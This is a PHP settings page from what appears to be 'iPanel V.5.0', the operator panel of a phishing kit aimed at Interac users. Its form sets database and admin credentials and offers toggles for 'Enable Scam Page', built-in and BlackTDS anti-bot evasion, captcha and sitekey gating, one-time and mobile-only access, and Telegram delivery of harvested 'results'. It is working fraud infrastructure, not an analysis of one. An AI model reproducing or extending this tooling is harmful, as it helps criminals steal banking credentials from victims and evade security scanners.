<?php
include 'inc/config.php';
include 'inc/connect.php';
date_default_timezone_set('Europe/Dublin');
session_start();
if (!isset($_SESSION['loggedin'])) {
    header('Location: login.php');
    exit;
}

if ($handlers_access != "checked") {
    if ($_SESSION['role'] != "Admin") {
        die();
    }
}
?>

<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>iPanel - Settings</title>
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="robots" content="all,follow">
    <!-- Bootstrap CSS-->
    <link rel="stylesheet" href="vendor/bootstrap/css/bootstrap.min.css">
    <!-- Font Awesome CSS-->
    <link rel="stylesheet" href="vendor/font-awesome/css/font-awesome.min.css">
    <!-- Micron Animations CSS-->
    <link rel='stylesheet' href='https://unpkg.com/webkul-micron@1.1.6/dist/css/micron.min.css'>
    <!-- Custom Font Icons CSS-->
    <link rel="stylesheet" href="css/font.css">
    <!-- Toasrt Alerts CSS-->
    <link rel="stylesheet" href="css/toastr.min.css">
    <!-- Flags Icons CSS-->
    <link rel="stylesheet" href="css/flag-icon.css">
    <!-- Google fonts - Muli-->
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Muli:300,400,700">
    <!-- theme stylesheet-->
    <link rel="stylesheet" href="css/style.red.css" id="theme-stylesheet">
    <!-- Custom stylesheet - for your changes-->
    <link rel="stylesheet" href="css/custom.css">
    <!-- Favicon-->
    <link rel="shortcut icon" href="img/favicon.ico">

    <style>
        .blink_me {
            animation: blinker 1s linear infinite;
        }

        @keyframes blinker {
            50% {
                background-color: rgba(134, 77, 217, 0.3);
            }
        }
    </style>


</head>

<body>
    <header class="header">
        <nav class="navbar navbar-expand-lg">

            <div class="container-fluid d-flex align-items-center justify-content-between">
                <div class="navbar-header">
                    <!-- Navbar Header--><a href="index.php" class="navbar-brand">
                        <div class="brand-text brand-big visible text-uppercase"><strong class="text-primary text-lowercase">i</strong><strong>Panel</strong><sub><small> V.5.0</sub></mall>
                        </div>
                        <div class="brand-text brand-sm"><strong class="text-primary">i</strong><strong>P</strong></div>
                    </a>
                    <!-- Sidebar Toggle Btn-->
                    <button onclick="profile_avatar(this);" class="sidebar-toggle"><i class="fa fa-long-arrow-left"></i></button>
                </div>

                <!-- Log out               -->
                <div class="list-inline-item logout"><a id="logout" href="logout.php" class="nav-link"> <span class="d-none d-sm-inline"></span><i title="Logout" class="icon-logout"></i></a></div>
            </div>
            </div>
        </nav>
    </header>
    <div class="d-flex align-items-stretch">
        <!-- Sidebar Navigation-->
        <nav id="sidebar">
            <!-- Sidebar Header-->
            <div class="sidebar-header d-flex align-items-center">
                <div id="profile_avatar" class="avatar"><img src="img/avatar.png" class="img-fluid rounded-circle"></div>
                <div class="title">
                    <h1 class="h5"><?php echo $_SESSION['username']; ?></h1>
                    <p><?php echo $_SESSION['role']; ?></p>
                </div>
            </div>

            <ul class="list-unstyled">
                <li><a href="index.php"> <i class="icon-home"></i>Home </a></li>
                <?php
                if ($_SESSION['role'] == "Admin") {
                    echo '<li><a href="handlers.php"> <i class="icon-user"></i>Handlers </a></li>';
                }

                if ($handlers_access != "checked") {
                    if ($_SESSION['role'] == "Admin") {
                        echo '<li><a href="interac.php"> <i class="icon-website"></i>Interac </a></li>';
                        echo '<li class="active"><a href="settings.php"> <i class="icon-settings"></i>Settings </a></li>';
                    }
                } else {
                    echo '<li><a href="interac.php"> <i class="icon-website"></i>Interac </a></li>';
                    echo '<li class="active"><a href="settings.php"> <i class="icon-settings"></i>Settings </a></li>';
                }
                ?>
        </nav>
        <!-- Sidebar Navigation end-->
        <div class="page-content">
            <div class="page-header">
                <div class="container-fluid">
                    <h2 class="h5 no-margin-bottom">Settings</h2>
                </div>
            </div>

            <section class="no-padding-bottom">
                <div class="col-lg-12">
                    <div class="block">
                        <div class="title"><strong>Page Config</strong></div>
                        <div class="block-body">
                            <form method="POST" action="set.php" class="form-horizontal">
                                <br>
                                <div class="form-group row">
                                    <label class="col-sm-3 form-control-label">Database Host</label>
                                    <div class="col-sm-9">
                                        <input value="<?= $servername ?>" name="dbhost" type="text" class="form-control" required>
                                    </div>
                                </div>


                                <div class="form-group row">
                                    <label class="col-sm-3 form-control-label">Database Name</label>
                                    <div class="col-sm-9">
                                        <input value="<?= $database ?>" name="dbname" type="text" class="form-control" required>
                                    </div>
                                </div>


                                <div class="form-group row">
                                    <label class="col-sm-3 form-control-label">Database Username</label>
                                    <div class="col-sm-9">
                                        <input value="<?= $username ?>" name="dbuser" type="text" class="form-control" required>
                                    </div>
                                </div>


                                <div class="form-group row">
                                    <label class="col-sm-3 form-control-label">Database Password</label>
                                    <div class="col-sm-9">
                                        <input value="<?= $password ?>" name="dbpass" type="password" class="form-control">
                                    </div>
                                </div>
                                <br>

                                <div class="form-group row">
                                    <label class="col-sm-3 form-control-label">Admin Username</label>
                                    <div class="col-sm-9">
                                        <input value="<?= $admin_panel_username ?>" name="adminuser" type="text" class="form-control" required>
                                    </div>
                                </div>


                                <div class="form-group row">
                                    <label class="col-sm-3 form-control-label">Admin Password</label>
                                    <div class="col-sm-9">
                                        <input value="<?= $admin_panel_password ?>" name="adminpass" type="password" class="form-control" required>
                                    </div>
                                </div>
                                <br>

                                <div class="form-group row">
                                    <label class="col-sm-3 form-control-label">Exit Link</label>
                                    <div class="col-sm-9">
                                        <input value="<?= $exit_url ?>" name="extlink" type="url" class="form-control" required>
                                    </div>
                                </div>
                                <br>

                                <div class="form-group row">
                                    <label class="col-sm-3 form-control-label">Telegram Chat Id</label>
                                    <div class="col-sm-9">
                                        <input value="<?= $telegram_chaid ?>" name="chatid" type="text" class="form-control"><small class="help-block-none">Find your chat id using this bot <a target="_blank" href="https://t.me/get_id_bot">@get_id_bot</a> on telegram.</small>
                                    </div>
                                </div>
                                <br>


                                <div class="form-group row">
                                    <label class="col-sm-3 form-control-label">Telegram Bot Token</label>
                                    <div class="col-sm-9">
                                        <input value="<?= $bot_token ?>" name="bottoken" type="text" class="form-control">
                                    </div>
                                </div><br>
								
                                <div class="form-group row">
                                    <label class="col-sm-3 form-control-label">SiteKey Word</label>
                                    <div class="col-sm-9">
                                        <input value="<?= $sitekey_word ?>" name="sitekeyword" type="text" class="form-control">
                                    </div>
                                </div><br>
								
                                <div class="form-group row">
                                    <label class="col-sm-3 form-control-label">Captcha v2 Site Key</label>
                                    <div class="col-sm-9">
                                        <input value="<?= $captcha_key ?>" name="captchakey" type="text" class="form-control">
                                    </div>
                                </div>
                                <br><br>



                                <div class="form-group row">
                                    <label class="col-sm-3 form-control-label">Config &amp; Permissions</label>
                                    <div class="col-sm-9">

                                        

                                        <div class="i-checks">
                                            <input name="gateway" id="checkbox1" type="checkbox" class="checkbox-template" <?= $enable_gateway ?>>
                                            <label for="checkbox1">Enable Scam Page</label>
                                        </div>

                                        <div class="i-checks">
                                            <input name="antibots" id="checkbox2" type="checkbox" class="checkbox-template" <?= $enable_antibots ?>>
                                            <label for="checkbox2">Enable Built-In Antibots</label>
                                        </div>

                                        <div class="i-checks">
                                            <input name="blacktds" id="checkbox35" type="checkbox" class="checkbox-template" <?= $enable_blacktds ?>>
                                            <label for="checkbox35">Enable BackTDS Antibots (Put PHP2 Code into blacktds.php file)</label>
                                        </div>
                        
                                      <div class="i-checks">
                                            <input name="captchaenabled" id="checkbox53" type="checkbox" class="checkbox-template" <?= $captcha_enabled ?>>
                                            <label for="checkbox53">Enable Captcha</label>
                                        </div> 

                                      <div class="i-checks">
                                            <input name="sitekey" id="checkbox5" type="checkbox" class="checkbox-template" <?= $sitekey_enabled ?>>
                                            <label for="checkbox5">Enable SiteKey</label>
                                        </div> 

                                        <div class="i-checks">
                                            <input name="onetime" id="checkbox6" type="checkbox" class="checkbox-template" <?= $enable_onetime ?>>
                                            <label for="checkbox6">OneTime Access</label>
                                        </div>
                                        <div class="i-checks">
                                            <input name="moblock" id="checkbox8" type="checkbox" class="checkbox-template" <?= $mobile_lock ?>>
                                            <label for="checkbox8">Mobile Only</label>
                                        </div>

                                        <div class="i-checks">
                                            <input name="notify" id="checkbox3" type="checkbox" class="checkbox-template" <?= $enable_telegram ?>>
                                            <label for="checkbox3">Enable Telegram Results</label>
                                        </div>

                                        <div class="i-checks">
                                            <input name="hsettings" id="checkbox4" type="checkbox" class="checkbox-template" <?= $handlers_access ?>>
                                            <label for="checkbox4">Allow Handlers To Access Settings</label>
                                        </div>

                                    </div>
                                </div>

                                <br><br>
                                <div class="form-group row">
                                    <div class="col-sm-9 ml-auto">
                                        <button type="submit" class="btn btn-primary">Save changes</button>&nbsp;&nbsp;
                                    </div>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </section>
            <footer class="footer">
                <div class="footer__block block no-margin-bottom">
                    <div class="container-fluid text-center">
                        <!-- <p>2024 &copy; All Rights Reserved - <a target="_blank" href="https://t.me/The_iHack">iHack</a></p> -->
                    </div>
                </div>
            </footer>
        </div>
    </div>
    <!-- JavaScript files-->
    <script src="vendor/jquery/jquery.min.js"></script>
    <script src="vendor/popper.js/umd/popper.min.js"> </script>
    <script src="vendor/bootstrap/js/bootstrap.min.js"></script>
    <script src="vendor/jquery.cookie/jquery.cookie.js"> </script>
    <script src="vendor/jquery-validation/jquery.validate.min.js"></script>
    <script src="js/front.js"></script>
    <script src="js/toastr.min.js"></script>
    <script src="https://unpkg.com/webkul-micron@1.1.6/dist/script/micron.min.js"></script>
    <script src="js/other.js"></script>
    <?php
    if ($_SESSION['update_settings'] == 'success') {
        echo '<script>toastr["success"]("settings updated successfully");</script>';
        $_SESSION['update_settings'] = '';
    }
    ?>

</body>

</html>